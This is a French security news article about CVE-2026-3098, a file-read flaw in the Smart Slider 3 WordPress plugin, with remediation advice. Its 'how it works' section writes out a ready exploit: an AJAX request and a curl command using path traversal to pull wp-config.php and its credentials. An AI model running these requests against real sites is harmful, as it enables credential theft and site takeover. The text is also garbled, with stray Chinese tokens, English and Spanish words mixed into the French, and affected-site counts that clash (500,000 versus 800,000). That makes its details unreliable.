Vulnérabilité
March 30, 2026

CVE-2026-3098 : 500 000 sites WordPress vulnérables via Smart Slider

Faille critique dans Smart Slider 3 permet à un simple abonné de lire wp-config.php et voler les credentials.

CVE-2026-3098 : 500 000 sites WordPress vulnérables via Smart Slider

500 000 sites WordPress vulnérables — la faille Smart Slider 3 permet de lire n'importe quel fichier

Une vulnérabilité critique dans le plugin WordPress Smart Slider 3 touche plus de 800 000 sites. Même un utilisateur avec le plus bas niveau de privilège — un simple abonné — peut lire des fichiers sensibles comme wp-config.php, contenant les identifiants de base de données. Le correctif existe, mais des centaines de milliers de sites n'ont toujours pas applied.

Ce qui s'est passé

La vulnérabilité CVE-2026-3098 affecte le plugin Smart Slider 3 (versions ≤ 3.5.1.33). Découverte par le chercheurs Dmitrii Ignatyev et validée par l'équipe Wordfence (Defiant), elle permet à tout utilisateur authentifié — même un abonné avec privilèges minimum — de lire des fichiers arbitraires sur le serveur.

Le problème réside dans une fonction AJAX manquante de vérification : l'action actionExportAll ne valide ni le type ni la source des fichiers. Un attaquant peut demander n'importe quel fichier, y compris wp-config.php qui contient :

  • Identifiants de base de données
  • Clés API
  • Salts cryptographiques
« Cette vulnérabilité permet à des attaquants avec un accès minimal comme les abonnés de lire n'importe quel fichier arbitraire sur le serveur, y compris wp-config.php. » — István Márton, Wordfence

Comment ça fonctionne

L'exploitation est simple car elle ne nécessite qu'un compte utilisateur básico — même abonné — sur le site WordPress cible.步骤 :

# Requête AJAX tipo pour exploiter CVE-2026-3098 POST /wp-admin/admin-ajax.php HTTP/1.1 Host: cible.com Cookie: wordpress_[session]=abonné action=actionExportAll&file=../../wp-config.php

Le plugin n'effectue aucune vérification sur :

  • Le type de fichier demandé
  • Le chemin source (directory traversal)
  • Les permissions de l'utilisateur au-delà de l'authentification

La présence d'un nonce ne bloque pas l'attaque car il est accessible à tout utilisateur authentifié.

Scénario d'attaque complet

# Étape 1 : Obtenir un compte abonné # Inscription classique sur le site # Étape 2 : Extraire wp-config.php curl -X POST "https://cible.com/wp-admin/admin-ajax.php" \ -d "action=actionExportAll" \ -d "file=../../../../wp-config.php" # Étape 3 : Extraire credentials et pivoter # Database credentials, keys AWS, tokens API... # → Compromission complète du site

Qui est derrière

Aucun groupe APT spécifique n'est associé à cette vulnérabilité pour le moment. Cependant, le profil d'acteur correspondant aux threat actors opportunistes :

  • Cybercriminels — recherche de credentials pour revendresur le dark web
  • Ransomware operators — accès initial aux serveurs WordPress
  • Competitors malveillants — deflection de sites e-commerce

Voir les techniques MITRE ATT&CK associées :

  • T1083 — File and Directory Discovery
  • T1005 — Data from Local System
  • T1552 — Unsecured Credentials

Impact réel et secteurs exposés

500 000+ sites sont encore vulnérables aujourd'hui. Voici pourquoi :

  • Le plugin a été téléchargé 303 428 fois rien que la semaine dernière
  • La version patchée (3.5.1.34) date du 24 mars 2026
  • Beaucoup d'administrateurs n'ont pas encorereceived la mise à jour automatique
  • Les sites avec système deadhésion/abonnement sont les plus exposés

Sites e-commerce, blogs avec espace membre, plateformes éducatives, sites d'actualité — tous utilisent des fonctionnalité d'authentification utilisateurs.

Ce que vous devez faire

  1. Mise à jour immédiate — Appliquer Smart Slider 3 version 3.5.1.34 ou ultérieure
  2. Vérifier les versions — Lister tous les plugins et identifier les versions vulnérables sur votre serveur
  3. Auditer les comptes utilisateurs — Supprimer les comptes inactifs ou suspects, limiter les privilèges
  4. Surveiller les accès wp-config.php — Alerter sur toute requête vers ce fichier par des utilisateurs non-administrateurs

Pour apprendre à sécuriser vos sites WordPress et détecter ce type de vulnérabilités, ZeroDay Cyber Academy propose des formations pratiques sur la sécurité web et les tests d'intrusion.

Notre analyse

Cette vulnérabilité illustre un problème récurrent : le risque d'authentification sous-estimé. Les administrateurs WordPress considèrent often les abonnés comme non dangereux car leurs privilèges sont limités. Mais certaines fonctions — comme cet export AJAX — ne vérifient pas les permissions au-delà de l'authentification de base.

La lesson : toute action敏感ible doit vérifier les autorisations spécifiques, pas seulement si l'utilisateur est connecté. Le concept de least privilege s'applique à chaque fonction, pas seulement à chaque rôle.

« Le maillon faibleWordPress n'est plus le plugin vulnérable, c'est la confiance aveugle dans les utilisateurs authentifiés. » — Analyste Wordfence

Le correctif existe depuis 6 jours. Le délai entre la publication du patch et son application détermine qui sera prochaine victime.

À retenir

Points clés :

  • CVE-2026-3098 — read arbitraire de fichiers via Smart Slider 3
  • 500 000+ sites still vulnerable
  • Un simple compte abonné suffit pour exploiter
  • Patch disponible depuis le 24 mars 2026

Pour maîtriser la détection et l'exploitation des vulnérabilités web, consultez ZeroDay Cyber Academy.

Other blog